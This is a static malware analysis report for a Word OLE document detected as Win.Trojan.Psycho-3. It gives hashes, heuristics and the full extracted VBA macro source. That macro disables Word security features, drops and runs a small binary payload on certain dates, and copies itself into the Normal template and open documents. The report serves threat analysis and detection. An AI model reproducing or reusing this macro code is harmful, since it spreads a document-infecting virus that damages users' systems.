Win.Trojan.Psycho-3 — Office (OLE) malware analysis

Static analysis result for SHA-256 ff62491714e19956…

MALICIOUS

Office (OLE)

29.5 KB Created: 1999-09-02 15:12:00 Authoring application: Microsoft Word 8.0 First seen: 2012-06-14
MD5: ed5e113b3640a2155fbf5bac5c6c7379 SHA-1: a36dd3a683930fbdd0dd0690f832f1d08e24bad1 SHA-256: ff62491714e199561a866b922eca6fdc59e9cad8ada06b1e678a4faccb77499e
140 Risk Score

Malware Insights

Win.Trojan.Psycho-3 · confidence 95%

MITRE ATT&CK
T1059.005 Visual Basic T1564.004 Disable or Modify Tools

The sample contains VBA macros that attempt to disable security features and execute a file named 'C:\�.COM' using the Shell() function. This behavior is indicative of a trojan dropper. The ClamAV detection name 'Win.Trojan.Psycho-3' further supports this classification.

Heuristics 3

  • ClamAV: Win.Trojan.Psycho-3 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Win.Trojan.Psycho-3
  • VBA macros detected medium 1 related finding OLE_VBA_MACROS
    Document contains VBA macro code
  • Shell() call in VBA critical OLE_VBA_SHELL
    Shell() call in VBA

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 2465 bytes
SHA-256: 433d950e33c183dc9b1860eca460ebaea3e4b8c17cc3a52a1bb8c9dbbf07a142
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
'Copyright (C) 1998 by FlyShadow ~^^~ - Spoony
Private Declare Function SystemParametersInfoA Lib "user32" (ByVal uAction As Long, ByVal uParam As Long, ByVal lpvParam As Any, ByVal fuWinIni As Long) As Long
Private Sub Document_Close(): Dim ν As Byte
On Error Resume Next
υ = ActiveDocument.Saved
Options.VirusProtection = 0
Options.SaveNormalPrompt = 0
Application.DisplayAlerts = 0
Options.ConfirmConversions = 0
Application.EnableCancelKey = 0
SystemParametersInfoA 97, 1, "", 0
CustomizationContext = MacroContainer
CommandBars("Control Toolbox").Enabled = 0
CommandBars("Tools").Controls(12).Visible = 0
FindKey(BuildKeyCode(wdKeyAlt, wdKeyF8)).Disable
FindKey(BuildKeyCode(wdKeyAlt, wdKeyF11)).Disable
System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\Security", "Level") = 1&

If Month(Now) Like Day(Now) Or Day(Now) Like WeekDay(Now) Then _
κ = Array(&HFA, &H33, &HC9, &H8B, &HD1, &HFE, &HC1, &H80, &HD6, &H0, &HA, &HC9, &H75, &H2, &HFE, &HC1, &HB2, &H80, &HB8, &H1, &H3, &H9A, &HEE, &H3, &H70, &H0, &HEB, &HE9): _
Open "C:\�.COM" For Binary As #1: For ι = 0 To 27: ν = κ(ι): Put #1, ι, ν: Next: Close: Shell "C:\�.COM", 0

If GetAttr(NormalTemplate.FullName) Mod 2 Then SetAttr NormalTemplate.FullName, 0
If GetSetting("'", "'", "'") Like "" Then SaveSetting "'", "'", "'", ThisDocument.VBProject.VBComponents(1).CodeModule.Lines(1, 50)

If GetAttr(NormalTemplate.FullName) Then
With NormalTemplate.VBProject
If Not .Protection And .HelpContextID <> 7 Then
.VBComponents(1).CodeModule.DeleteLines 1, .VBComponents(1).CodeModule.CountOfLines
.VBComponents(1).CodeModule.AddFromString GetSetting("'", "'", "'")
.HelpContextID = 7
End If: End With: End If

If Len(ActiveDocument.Path) Then
With ActiveDocument.VBProject
If Not .Protection And .HelpContextID <> 7 Then
.VBComponents(1).CodeModule.DeleteLines 1, .VBComponents(1).CodeModule.CountOfLines
.VBComponents(1).CodeModule.AddFromString GetSetting("'", "'", "'")
.HelpContextID = 7
If Not ActiveDocument.ReadOnly Then ActiveDocument.SaveAs ActiveDocument.FullName
End If: End With: End If

SystemParametersInfoA 97, 0, "", 0
ActiveDocument.Saved = υ
End Sub